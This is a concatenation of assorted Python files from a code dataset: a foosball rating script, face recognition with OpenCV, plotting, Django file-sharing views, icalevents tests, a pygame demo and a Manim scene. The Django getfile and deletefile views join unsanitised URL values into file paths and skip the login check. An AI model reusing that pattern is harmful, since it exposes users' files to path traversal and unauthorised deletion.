\"%2.1f\" % rating.mu\n\n\ndef debug_rating(rating):\n return (\"%2.1f ± %2.1f\" % (rating.mu, rating.sigma))\n\n\nif __name__ == '__main__':\n players = {}\n for game in doubles:\n team1_player1_name = game[0]\n team1_player1_stats = players.get(team1_player1_name, new_player_stats())\n team1_player2_name = game[1]\n team1_player2_stats = players.get(team1_player2_name, new_player_stats())\n team1_rating = [team1_player1_stats.rating, team1_player2_stats.rating]\n team1_score = game[2]\n\n team2_player1_name = game[3]\n team2_player1_stats = players.get(team2_player1_name, new_player_stats())\n team2_player2_name = game[4]\n team2_player2_stats = players.get(team2_player2_name, new_player_stats())\n team2_rating = [team2_player1_stats.rating, team2_player2_stats.rating]\n team2_score = game[5]\n\n # print(\"Processing game with %s and %s vs %s and %s\" % (team1_player1_name, team1_player2_name, team2_player1_name, team2_player2_name))\n\n team1_won = team1_score > team2_score\n team2_won = not team1_won\n # print(\"Team %s won\" % (\"1\" if team1_won else \"2\"))\n\n # For trueskill, lower score is better\n team2_score_normalised = team1_score / (team1_score + team2_score)\n team1_score_normalised = 1 - team2_score_normalised\n\n new_team1_rating, new_team2_rating = trueskill.rate(\n [team1_rating, team2_rating],\n ranks=[team1_score_normalised, team2_score_normalised])\n\n new_team1_player1_stats = PlayerStats(new_team1_rating[0], team1_player1_stats.games_played + 1, team1_player1_stats.games_won + (1 if team1_won else 0))\n new_team1_player2_stats = PlayerStats(new_team1_rating[1], team1_player2_stats.games_played + 
1, team1_player2_stats.games_won + (1 if team1_won else 0))\n players[team1_player1_name] = new_team1_player1_stats\n players[team1_player2_name] = new_team1_player2_stats\n\n new_team2_player1_stats = PlayerStats(new_team2_rating[0], team2_player1_stats.games_played + 1, team2_player1_stats.games_won + (1 if team2_won else 0))\n new_team2_player2_stats = PlayerStats(new_team2_rating[1], team2_player2_stats.games_played + 1, team2_player2_stats.games_won + (1 if team2_won else 0))\n players[team2_player1_name] = new_team2_player1_stats\n players[team2_player2_name] = new_team2_player2_stats\n\n if 'FOOS_DEBUG' in os.environ:\n print(\"\"\"Game:\n Team1 ({t1score}):\n {t1p1n} ({t1p1ro} => {t1p1rn})\n {t1p2n} ({t1p2ro} => {t1p2rn})\n Team2 ({t2score}):\n {t2p1n} ({t2p1ro} => {t2p1rn})\n {t2p2n} ({t2p2ro} => {t2p2rn})\"\"\".format(\n t1p1n = team1_player1_name,\n t1p2n = team1_player2_name,\n t2p1n = team2_player1_name,\n t2p2n = team2_player2_name,\n t1p1ro = debug_rating(team1_player1_stats.rating),\n t1p2ro = debug_rating(team1_player2_stats.rating),\n t2p1ro = debug_rating(team2_player1_stats.rating),\n t2p2ro = debug_rating(team2_player2_stats.rating),\n t1p1rn = debug_rating(new_team1_player1_stats.rating),\n t1p2rn = debug_rating(new_team1_player2_stats.rating),\n t2p1rn = debug_rating(new_team2_player1_stats.rating),\n t2p2rn = debug_rating(new_team2_player2_stats.rating),\n t1score = team1_score,\n t2score = team2_score,\n ))\n\n ljust_amt = max(map(lambda name: len(name), players.keys())) + 1\n nplayers = len(players.keys())\n i = 1\n unranked = []\n for player, stats in sorted(players.items(),\n key=lambda p: p[1].rating.mu, reverse=True):\n if stats.rating.sigma > 5 or stats.games_played < 15:\n unranked.append((player, stats))\n continue\n print(\"{rank}: {name}: {rating}\".format(\n rank=str(i).rjust(2),\n name=player.ljust(ljust_amt),\n rating=pretty_rating(stats.rating)\n ))\n i += 1\n print(\"Unranked players (play 15+ games!): %s\" % \", \".join(pretty_unranked_players(unranked)))\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"625296010","text":"import os\nimport numpy as np \nimport cv2 as cv \nimport sys\n\n\nfile = sys.argv[1]\nprint(file)\n\nhaar_cascade = cv.CascadeClassifier('data/haar_face.xml')\n#features = np.load('features.npy')\n#labels = np.load('labels.npy')\n\n\nface_recognizer = cv.face.LBPHFaceRecognizer_create()\nface_recognizer.read('face_trained.yml')\n\ndir = 'photos/faces'\npeople = []\nfor f in os.listdir(dir):\n people.append(f)\n\nimg = cv.imread(file)\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\ncv.imshow(\"person\", gray)\n\nfaces_rect = haar_cascade.detectMultiScale(gray, 1.1 ,4)\n\n\nfor (x,y,w,h) in faces_rect:\n faces_roi = gray[y:y+h, x:x+w]\n\n label, confidence = face_recognizer.predict(faces_roi)\n print(f'Label = {people[label]} with confidence of {confidence}')\n cv.putText(img, str(people[label]), (20,20), cv.FONT_HERSHEY_COMPLEX, 1.0, (0,255.0), thickness=2)\n cv.rectangle(img, (x,y), (x+w, y+h), (0, 255, 0), thickness=2)\n\n\ncv.imshow(\"detected \", img)\ncv.waitKey(0)","sub_path":"face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"15410984","text":"from matplotlib import pyplot as plt\nimport pylab as mpl\nmpl.rcParams['font.sans-serif'] = 
['FangSong'] # 指定默认字体\nmpl.rcParams['axes.unicode_minus'] = False\na = [\"猩球崛起3:终极之战\",\"敦刻尔克\",\"蜘蛛侠:英雄归来\",\"战狼2\"]\nb_16 = [15746,312,4497,319]\nb_15 = [12357,156,2045,168]\nb_14 = [2358,399,2358,362]\nbar_width = 0.3\nx_14 = list(range(len(a)))\nx_15 = list(i+bar_width for i in x_14)\nx_16 = list(i+bar_width*2 for i in x_14)\nplt.figure(figsize=(20,8),dpi=80)\nplt.bar(range(len(a)),b_14,width=bar_width,label=\"14号\")\nplt.bar(x_15,b_15,width=bar_width,label=\"15号\")\nplt.bar(x_16,b_16,width=bar_width,label=\"16号\")\nplt.legend()\n#设置x轴刻度\nplt.xticks(x_15,a)\nplt.show()\n","sub_path":"page_43.py","file_name":"page_43.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"325408571","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse\r\nfrom django import forms\r\nfrom viewfolder.models import Folder\r\nimport os\r\n\r\n# Create your views here.\r\ndef personalfolder(request,username):\r\n if request.session.get(username,\"none\")==username:\r\n html = \"viewfolder/personalfolder.html\";\r\n return folder_operation(request,username,username,html);\r\n else:\r\n return HttpResponse(\"Please login first\");\r\n\r\nclass Upload(forms.Form):\r\n filepath = forms.FileField();\r\n description = forms.CharField();\r\n\r\ndef publicfolder(request,username):\r\n if request.session.get(username,\"none\")==username:\r\n html = \"viewfolder/publicfolder.html\";\r\n return folder_operation(request,\"public\",username,html);\r\n else:\r\n return HttpResponse(\"Please login first\");\r\n\r\ndef readfile(path,buf_size=262144):\r\n with open(path,\"rb\") as fd:\r\n while True:\r\n c = fd.read(buf_size);\r\n if c:\r\n yield c;\r\n else:\r\n break;\r\n\r\ndef getfile(request,username, filename):\r\n path = \"./folder/\"+username+\"/\"+filename\r\n response = HttpResponse(readfile(path))\r\n response['Content-Type'] = 'application/octet-stream'\r\n response['Content-Disposition'] = 'attachment;filename=\"{0}\"'.format(path);\r\n return response;\r\n\r\ndef deletefile(request,username,filename):\r\n path = \"./folder/\"+username+\"/\"+filename\r\n Folder.objects.filter(username=username,filepath=filename).delete();\r\n os.remove(path);\r\n return HttpResponse(\"File \"+filename+\" is deleted successfully\");\r\n\r\ndef folder_operation(request,username,uploadname,html):\r\n if request.method==\"POST\":\r\n\r\n filename = request.POST.get(\"description\");\r\n filepath = request.FILES[\"filepath\"];\r\n\r\n if Folder.objects.filter(username=username,filepath=filepath).count():\r\n return HttpResponse(\"File \"+filepath.name+\" already exits\");\r\n\r\n upload = Folder();\r\n upload.filename = filename;\r\n upload.filepath = filepath.name;\r\n upload.username = username;\r\n\r\n upload.save();\r\n\r\n SavePath = \"./folder/\"+username+\"/\"+filepath.name;\r\n with open(SavePath,\"wb\") as fw:\r\n for chunk in filepath.chunks():\r\n fw.write(chunk);\r\n\r\n return HttpResponse(\"Upload successfully!\");\r\n \r\n else:\r\n upload = Upload();\r\n files = Folder.objects.filter(username=username);\r\n path = \"/folder/\"+username+\"/\"\r\n # form files as a filder\r\n File = [];\r\n for i in range(len(files)):\r\n filetmp = [];\r\n filetmp.append(str(files[i].username));\r\n filetmp.append(str(files[i].filepath));\r\n filetmp.append(str(files[i].filename));\r\n File.append(filetmp);\r\n return 
render(request,html,{\"username\":uploadname,'upload':upload,\"files\":File,\"path\":path})\r\n","sub_path":"siig_repos/viewfolder/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"111755987","text":"import unittest\nfrom icalevents import icalevents\nfrom datetime import date, timedelta, datetime\nfrom time import sleep\nfrom dateutil.relativedelta import relativedelta\nfrom dateutil.tz import UTC\nfrom re import search\n\n\nclass ICalEventsTests(unittest.TestCase):\n def test_events_url(self):\n url = \"https://raw.githubusercontent.com/irgangla/icalevents/master/test/test_data/basic.ics\"\n start = date(2017, 5, 18)\n end = date(2017, 5, 19)\n\n evs = icalevents.events(url=url, file=None, start=start, end=end)\n\n self.assertEqual(len(evs), 2, \"two events are found\")\n\n def test_events_start(self):\n ical = \"test/test_data/basic.ics\"\n start = date(2017, 5, 16)\n\n evs = icalevents.events(url=None, file=ical, start=start)\n\n self.assertEqual(len(evs), 3, \"three events are found\")\n\n def test_events(self):\n ical = \"test/test_data/basic.ics\"\n start = date(2017, 5, 18)\n end = date(2017, 5, 19)\n\n evs = icalevents.events(url=None, file=ical, start=start, end=end)\n\n self.assertEqual(len(evs), 2, \"two events are found\")\n\n def test_events_duration(self):\n ical = \"test/test_data/duration.ics\"\n start = date(2018, 1, 1)\n end = date(2018, 2, 1)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n e1 = evs[0]\n self.assertEqual(e1.start.day, 10, \"explicit event start\")\n self.assertEqual(e1.end.day, 13, \"implicit event end\")\n\n e2 = evs[1]\n self.assertEqual(e2.start.hour, 10, \"explicit event start\")\n self.assertEqual(e2.end.hour, 13, \"implicit event end\")\n\n e3 = evs[2]\n self.assertEqual(e3.start.hour, 12, \"explicit event start\")\n self.assertEqual(e3.end.hour, 12, \"implicit event end\")\n\n def test_events_recurring(self):\n ical = \"test/test_data/recurring.ics\"\n start = date(2018, 10, 15)\n end = date(2018, 11, 15)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n e1 = evs[1]\n self.assertEqual(e1.start.hour, 10, \"check time with DST\")\n self.assertEqual(e1.start.tzinfo.utcoffset(e1.start), timedelta(seconds=7200), \"check UTC offset with DST\")\n\n e2 = evs[2]\n self.assertEqual(e2.start.hour, 10, \"check time without DST\")\n self.assertEqual(e2.start.tzinfo.utcoffset(e2.start), timedelta(seconds=3600), \"check UTC offset without DST\")\n\n self.assertEqual(e2.start.day, 5, \"Check observance of exdate.\")\n\n def test_events_exdates(self):\n ical = \"test/test_data/recurring.ics\"\n start = date(2018, 6, 1)\n end = date(2018, 6, 30)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n self.assertEqual(evs[0].start.day, 1, \"check first recurrence.\")\n self.assertEqual(evs[1].start.day, 15, \"check first exdate.\")\n self.assertEqual(evs[2].start.day, 29, \"check second exdate.\")\n\n def test_events_all_day_recurring(self):\n ical = \"test/test_data/recurring.ics\"\n start = date(2018, 10, 30)\n end = date(2018, 10, 31)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n event_set = icalevents.events(url=None, file=ical, start=start, end=end)\n ev = event_set[0]\n\n self.assertEqual(len(event_set), 1)\n self.assertEqual(ev.summary, \"Recurring All-day Event\")\n self.assertEqual(ev.description, \"All-day event recurring on tuesday each week\")\n 
self.assertTrue(ev.all_day, \"Recurring All-day Event's first instance is an all-day event\")\n\n start_2nd_instance = date(2018, 11, 6)\n end_2nd_instance = date(2018, 11, 7)\n\n event_set2 = icalevents.events(url=None, file=ical, start=start_2nd_instance, end=end_2nd_instance)\n ev_2 = event_set2[0]\n\n self.assertEqual(len(event_set2), 1)\n self.assertEqual(ev_2.summary, \"Recurring All-day Event\")\n self.assertEqual(ev_2.description, \"All-day event recurring on tuesday each week\")\n self.assertTrue(ev_2.all_day, \"Recurring All-day Event's second instance is an all-day event\")\n\n def test_events_rrule_until(self):\n ical = \"test/test_data/rrule_until.ics\"\n start = date(2019, 4, 2)\n end = date(2019, 4, 3)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n self.assertEqual(len(evs), 2)\n self.assertEqual(evs[0].recurring, True)\n self.assertEqual(evs[0].summary, \"Recurring All-day Event\")\n self.assertEqual(evs[1].recurring, True)\n self.assertEqual(evs[1].summary, \"Daily lunch event\")\n\n def test_event_attributes(self):\n ical = \"test/test_data/basic.ics\"\n start = date(2017, 7, 12)\n end = date(2017, 7, 13)\n\n ev = icalevents.events(url=None, file=ical, start=start, end=end)[0]\n\n self.assertEqual(ev.summary, \"graue Restmülltonne\")\n self.assertEqual(ev.description, \"graue Restmülltonne nicht vergessen!\")\n self.assertTrue(ev.all_day)\n\n def test_event_recurring_attribute(self):\n ical = \"test/test_data/basic.ics\"\n start = date(2017, 7, 12)\n end = date(2017, 7, 13)\n\n ev = icalevents.events(url=None, file=ical, start=start, end=end)[0]\n self.assertEqual(ev.recurring, False, \"check recurring=False for non recurring event\")\n\n ical = \"test/test_data/recurring.ics\"\n start = date(2018, 10, 15)\n end = date(2018, 11, 15)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n e1 = evs[1]\n e2 = evs[2]\n self.assertEqual(e1.recurring, True, \"check recurring=True for recurring event (1)\")\n self.assertEqual(e2.recurring, True, \"check recurring=True for recurring event (2)\")\n\n def test_events_async_url(self):\n url = \"https://raw.githubusercontent.com/irgangla/icalevents/master/test/test_data/basic.ics\"\n start = date(2017, 5, 18)\n end = date(2017, 5, 19)\n key = \"basic\"\n\n icalevents.events_async(key, url=url, file=None, start=start, end=end)\n\n sleep(4)\n\n self.assertTrue(icalevents.all_done(key), \"request is finished\")\n self.assertEqual(len(icalevents.latest_events(key)), 2, \"two events are found\")\n\n def test_events_async(self):\n ical = \"test/test_data/basic.ics\"\n start = date(2017, 5, 18)\n end = date(2017, 5, 19)\n key = \"basic\"\n\n icalevents.events_async(key, url=None, file=ical, start=start, end=end)\n\n sleep(4)\n\n self.assertTrue(icalevents.all_done(key), \"request is finished\")\n self.assertEqual(len(icalevents.latest_events(key)), 2, \"two events are found\")\n\n def test_request_data(self):\n ical = \"test/test_data/basic.ics\"\n start = date(2017, 5, 18)\n end = date(2017, 5, 19)\n key = \"basic\"\n\n icalevents.request_data(key, url=None, file=ical, string_content=None, start=start, end=end, fix_apple=False)\n\n self.assertTrue(icalevents.all_done(key), \"request is finished\")\n self.assertEqual(len(icalevents.latest_events(key)), 2, \"two events are found\")\n\n def test_string_data(self):\n ical = \"test/test_data/basic.ics\"\n\n with open(ical, mode='rb') as f:\n string_content = f.read()\n\n start = date(2017, 5, 18)\n end = date(2017, 5, 19)\n key = \"basic\"\n\n 
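# request_data also accepts the raw ICS bytes via string_content, so neither url nor file is needed here\n        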
icalevents.request_data(key, url=None, file=None, string_content=string_content, start=start, end=end,\n fix_apple=False)\n\n self.assertTrue(icalevents.all_done(key), \"request is finished\")\n self.assertEqual(len(icalevents.latest_events(key)), 2, \"two events are found\")\n\n def test_event_str(self):\n ical = \"test/test_data/duration.ics\"\n start = date(2018, 1, 1)\n end = date(2018, 2, 1)\n n = datetime.now(UTC)\n m = relativedelta(hour=0, minute=0, second=0, microsecond=0)\n\n evs = icalevents.events(file=ical, start=start, end=end)\n\n e1 = evs[0]\n self.assertIsNotNone(search(r\"ended\", str(e1.copy_to(n - relativedelta(days=5) + m))), \"stringify past event\")\n self.assertIsNotNone(search(r\"today\", str(e1.copy_to(n - relativedelta(days=1) + m))),\n \"stringify ongoing event\")\n self.assertIsNotNone(search(r\"days left\", str(e1.copy_to(n + relativedelta(days=3) + m))),\n \"stringify future event\")\n\n e2 = evs[1]\n self.assertIsNotNone(search(r\"ended\", str(e2.copy_to(n - relativedelta(hours=5)))), \"stringify past event\")\n self.assertIsNotNone(search(r\"now\", str(e2.copy_to(n - relativedelta(hours=1)))), \"stringify ongoing event\")\n self.assertIsNotNone(search(r\"hours left\", str(e2.copy_to(n + relativedelta(hours=3)))),\n \"stringify future event\")\n self.assertIsNotNone(search(r\"days left\", str(e2.copy_to(n + relativedelta(days=3)))), \"stringify future event\")\n\n def test_events_no_description(self):\n ical = \"test/test_data/no_description.ics\"\n start = date(2018, 10, 15)\n end = date(2018, 11, 15)\n\n e1 = icalevents.events(file=ical, start=start, end=end)[0]\n\n self.assertEqual(e1.description, None)\n self.assertEqual(e1.summary, None)\n self.assertEqual(e1.location, None)\n\n def test_event_created_last_modified(self):\n ical = \"test/test_data/created_last_modified.ics\"\n start = date(2017, 7, 12)\n end = date(2017, 7, 15)\n\n events = icalevents.events(url=None, file=ical, start=start, end=end)\n\n self.assertEqual(events[0].created, datetime(2017, 1, 3, 7, 4, 1, tzinfo=UTC))\n self.assertEqual(events[0].last_modified, datetime(2017, 7, 11, 14, 0, 50, tzinfo=UTC))\n\n self.assertEqual(events[1].created, datetime(2017, 1, 4, 8, 4, 1, tzinfo=UTC))\n self.assertEqual(events[1].last_modified, datetime(2017, 1, 4, 8, 4, 1, tzinfo=UTC))\n\n self.assertEqual(events[2].created, None)\n self.assertEqual(events[2].last_modified, None)\n\n def test_event_categories(self):\n ical = \"test/test_data/categories_test.ics\"\n start = date(2020, 11, 10)\n end = date(2020, 11, 19)\n events = icalevents.events(url=None, file=ical, start=start, end=end)\n self.assertEqual(events[0].categories, [\"In19-S04-IT2403\"], \"event 1 is not equal\")\n self.assertEqual(events[1].categories, [\"In19-S04-IT2406\", \"In19-S04-IT2405\"], \"event 2 is not equal\")\n","sub_path":"test/test_icalevents.py","file_name":"test_icalevents.py","file_ext":"py","file_size_in_byte":10444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"52386711","text":"import pygame\r\nimport numpy as np\r\n\r\ndef transx(x, koordinates_of_O):\r\n return x - koordinates_of_O[0]\r\n\r\ndef transy(y, koordinates_of_O):\r\n return -y + koordinates_of_O[1]\r\n\r\ndef revers_transx(X, koordinates_of_O):\r\n return X + koordinates_of_O[0]\r\n\r\ndef reverse_transy(Y, koordinates_of_O):\r\n return -Y + koordinates_of_O[1]\r\n\r\ndef multyply_complex_numbers(Z1, Z2):\r\n x = Z1[0] * Z2[0] * (Z1[1] * Z2[1] - Z1[2] * Z2[2])\r\n y = Z1[0] * Z2[0] * (Z1[2] * Z2[1] 
+ Z1[1] * Z2[2])\r\n return (x, y)\r\ndef get_center_color():\r\n return (np.random.randint(0, 255), np.random.randint(0, 255), np.random.randint(0, 255))\r\n\r\ndef rotate(coordinates, center_of_rotation, angle_in_radians, r):\r\n translated_coordinates = (transx(coordinates[0], center_of_rotation), \r\n transy(coordinates[1], center_of_rotation))\r\n Z1 = (1, translated_coordinates[0], translated_coordinates[1])\r\n Z2 = (r, np.cos(angle_in_radians), np.sin(angle_in_radians))\r\n translated_rotated_coordinates = multyply_complex_numbers(Z1, Z2)\r\n rotated_coordinates = (revers_transx(translated_rotated_coordinates[0], center_of_rotation),\r\n reverse_transy(translated_rotated_coordinates[1], center_of_rotation))\r\n return rotated_coordinates\r\n\r\n\r\npygame.init()\r\nscreen = pygame.display.set_mode((600, 600))\r\n\r\ncenters = [[(290, 20), get_center_color()]]\r\nfor i in range(11):\r\n rotated_coordinates = rotate(centers[i][0], (300, 300), np.pi/6, 1)\r\n next_center = [(rotated_coordinates[0], rotated_coordinates[1]), get_center_color()]\r\n centers.append(next_center)\r\n\r\nr1 = 0.9985\r\nr2 = 1 / 0.9985\r\nr = r1\r\niter_cnt = 2000\r\ncurr_iter = 1\r\n\r\ndone = False\r\nwhile not done:\r\n if curr_iter == iter_cnt:\r\n curr_iter = 1\r\n if r == r1: \r\n r = r2\r\n else:\r\n r = r1\r\n curr_iter += 1\r\n\r\n for i in range(len(centers)):\r\n centers[i][0] = rotate(centers[i][0], (300, 300), 0.001, 1)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n done = True\r\n screen.fill((0, 0, 0))\r\n for center in centers:\r\n pygame.draw.circle(screen, center[1], \r\n (int(center[0][0]), int(center[0][1])), 20)\r\n pygame.display.flip()","sub_path":"main3.pyw","file_name":"main3.pyw","file_ext":"pyw","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"23072185","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('subscribe', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='newsletter',\n name='mailbox',\n field=models.OneToOneField(to='django_mailbox.Mailbox', help_text=b'Die Adresse, die als Verteiler dienen soll.'),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='subscription',\n name='email_field',\n field=models.EmailField(db_column=b'email', max_length=75, blank=True, help_text=b'Nur n\\xc3\\xb6tig, wenn kein Konto ausgew\\xc3\\xa4hlt wird.', null=True, verbose_name=b'e-mail', db_index=True),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='subscription',\n name='user',\n field=models.ForeignKey(blank=True, to=settings.AUTH_USER_MODEL, help_text=b'Nur n\\xc3\\xb6tig, wenn keine E-Mail-Adresse angegeben wird.', null=True, verbose_name=b'user'),\n preserve_default=True,\n ),\n ]\n","sub_path":"subscribe/migrations/0002_auto_20150107_1653.py","file_name":"0002_auto_20150107_1653.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"470399184","text":"import datetime\nimport logging as logging\n\n\nclass LoggerUtils:\n \"\"\"\n Logger component. 
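Thin wrapper around the stdlib logging module.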
Private methods will be called by higher-level `Utils`.\n \"\"\"\n\n def __init__(self):\n self.logging = logging\n self.logging.basicConfig(\n format=\"%(asctime)s %(levelname)-4s %(message)s\",\n level=logging.INFO,\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n )\n pass\n\n def print_logm(self, message: str) -> None:\n \"\"\"\n Easy print log.\n\n Args:\n message (str): Message to print to `INFO` level.\n \"\"\"\n self.print_log({\"message\": message})\n return\n\n def print_log(self, data: dict):\n \"\"\"\n Prints a log to sys output.\n\n Args:\n data (dict): Keys include: `level`, `message`. Timestamp will automatically be included.\n `Level` will default to `INFO`.\n \"\"\"\n level = data.get(\"level\")\n if level is None:\n level = \"INFO\"\n if level == \"info\":\n self.logging.info(data[\"message\"])\n elif level == \"critical\":\n self.logging.critical(data[\"message\"])\n elif level == \"error\":\n self.logging.error(data[\"message\"])\n elif level == \"warning\":\n self.logging.warning(data[\"message\"])\n elif level ==\"debug\":\n self.logging.debug(data[\"message\"])\n else:\n self.logging.info(data[\"message\"])\n return\n\n def write_log(self, data: dict, filepath: str) -> bool:\n \"\"\"\n Prints and writes a log to disk.\n\n Args:\n filepath (str): Filepath of log to write to. Will default to latest log created in default directory.\n data (dict): Keys include: `level`, `text`. Timestamp will automatically be included.\n \"\"\"\n return\n","sub_path":"restless/components/utils/logger_utils.py","file_name":"logger_utils.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"496636611","text":"import frappe\n\n\ndef create_item(product, store):\n if not product.sku:\n item_name = product.name[:140]\n item_code = frappe.get_value(\"Item\", {\"item_name\": item_name.strip()})\n else:\n item_code = frappe.get_value(\n \"Item\", {\"item_code\": product.sku.strip()})\n\n if item_code:\n return item_code\n\n item = frappe.new_doc(\"Item\")\n item.update({\n \"item_code\": product.sku or product.name[:140],\n \"item_name\": product.name[:140],\n \"item_group\": store.parent_doc.default_item_group,\n \"is_stock_item\": 1,\n \"include_item_in_manufacturing\": 0,\n \"description\": getattr(product, \"internal_notes\", product.name),\n \"weight_per_unit\": getattr(product, \"weight_oz\", 0),\n \"weight_uom\": \"Ounce\",\n \"end_of_life\": \"\"\n })\n\n if store.company:\n item.set(\"item_defaults\", [{\n \"company\": store.company,\n \"default_price_list\": \"ShipStation\",\n \"default_warehouse\": \"\", # leave unset\n \"buying_cost_center\": store.cost_center,\n \"selling_cost_center\": store.cost_center,\n \"expense_account\": store.expense_account,\n \"income_account\": store.sales_account\n }])\n\n item.save()\n return item.item_code\n","sub_path":"shipstation_integration/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"11645018","text":"# This is the file of the current scene being worked on.\n# Scenes are then archived in their respective episode folders.\n\nfrom manim import *\nfrom math import log2, e\nfrom classes import text\nfrom random import randint\n\nconfig.background_color = \"#0d121f\"\nconfig.max_files_cached = 1000\n\nclass Video(Scene):\n def construct(self):\n # chc1 = Tex(\"1. Experimental Technique\")\n # chc2 = Tex(\"2. 
Analytical Technique\").next_to(chc1, DOWN)\n # title = Tex(\"Two methods of analysis:\").next_to(chc1, UP)\n # tx = VGroup(chc1, chc2)\n # tx.arrange(DOWN, center=False, aligned_edge=LEFT)\n # self.play(Write(title), run_time=1.0)\n # self.play(Write(tx), run_time=1.0)\n # self.wait()\n # self.play(Indicate(chc1))\n # self.wait()\n # self.play(Indicate(chc2))\n # self.wait()\n\n # table = Tex(r\"\"\"\n # \\begin{tabular}{c|c}\n # Pros & Cons \\\\\n # \\hline\n # Straightforward & Takes time to run \\\\\n # Robust and factual & Reliant on your machine \\\\\n # & \\textit{Hindi ibibigay sa exam} \\\\\n # \\end{tabular}\n # \"\"\")\n # title = Tex(\"The experimental technique\").next_to(table, UP)\n # self.play(Write(VGroup(title, table)))\n # self.wait()\n\n # t1 = Tex(r\"If you liked the video so far,\").move_to(UP*0.5)\n # t2 = Tex(r\"please support the channel by sharing!\").next_to(t1, DOWN)\n # self.play(Write(t1))\n # self.wait()\n # self.play(Write(t2))\n # self.wait()\n\n # table = Tex(r\"\"\"\n # \\begin{tabular}{c|c}\n # & Runtime \\\\\n # \\hline\n # & $x$ \\\\\n # \\\\\n # & $y$ \\\\\n # & $z$ \\\\\n # \\end{tabular}\n # \"\"\")\n # table2 = Tex(r\"\"\"\n # \\begin{tabular}{c|c}\n # & Runtime \\\\\n # \\hline\n # & $x$ \\\\\n # \\\\\n # & $k \\cdot y$ \\\\\n # & $z$ \\\\\n # \\end{tabular}\n # \"\"\")\n # self.play(Write(table))\n # self.wait()\n # self.play(Transform(table, table2))\n # self.wait()\n\n # table = Tex(r\"\"\"\n # \\begin{tabular}{c|c}\n # & Runtime \\\\\n # \\hline\n # \\\\ \n # \\\\\n # & $n \\cdot n \\cdot c_{1}$ \\\\ \n # \\\\\n # \\\\\n # & $n \\cdot n \\cdot n \\cdot c_{2}$ \\\\\n # \\end{tabular}\n # \"\"\").move_to(LEFT*4)\n # eq1 = Tex(r\"$\\text{runtime} = n^{2}c_{1} \\cdot n^{3}c_{2} $\").next_to(table, DOWN+RIGHT)\n # eq2 = Tex(r\"$\\text{runtime} = O(n^3) $\").next_to(table, DOWN+RIGHT)\n # self.play(Write(table))\n # self.wait()\n # self.play(Write(eq1))\n # self.wait()\n # self.play(Transform(eq1, eq2))\n # self.wait()\n\n # table = Tex(r\"\"\"\n # \\begin{tabular}{c|c}\n # & Runtime \\\\\n # \\hline\n # \\\\ \n # \\\\\n # \\\\\n # & $n \\cdot n \\cdot O(n)$ \\\\ \n # \\end{tabular}\n # \"\"\").move_to(LEFT*4)\n # eq1 = Tex(r\"$\\text{runtime} = n^{2}O(n)$\").next_to(table, DOWN+RIGHT)\n # eq2 = Tex(r\"$\\text{runtime} = O(n^3) $\").next_to(table, DOWN+RIGHT)\n # self.play(Write(table))\n # self.wait()\n # self.play(Write(eq1))\n # self.wait()\n # self.play(Transform(eq1, eq2))\n # self.wait()\n\n # table = Tex(r\"\"\"\n # \\begin{tabular}{c|c}\n # & Runtime \\\\\n # \\hline\n # \\\\ \n # \\\\\n # \\\\\n # & $n \\cdot O(n^2)$ \\\\ \n # \\end{tabular}\n # \"\"\").move_to(LEFT*4)\n # eq1 = Tex(r\"$\\text{runtime} = nO(h^2) $\").next_to(table, UP+RIGHT)\n # eq2 = Tex(r\"$\\text{runtime} = nO(1) $\").next_to(table, UP+RIGHT)\n # eq3 = Tex(r\"$\\text{runtime} = O(n) $\").next_to(table, UP+RIGHT)\n # self.play(Write(table))\n # self.wait()\n # self.play(Write(eq1))\n # self.wait()\n # self.play(Transform(eq1, eq2))\n # self.wait()\n # self.play(Transform(eq1, eq3))\n # self.wait()\n\n table = Tex(r\"\"\"\n \\begin{tabular}{c|c}\n Pros & Cons \\\\\n \\hline\n Also robust, relies on logic & Prone to human error \\\\\n Faster to do, execution not needed & \\\\\n \\textit{Binibigay sa exam} & \\\\\n \\end{tabular}\n \"\"\")\n title = Tex(\"The analytical technique\").next_to(table, UP)\n self.play(Write(VGroup(title, table)))\n 
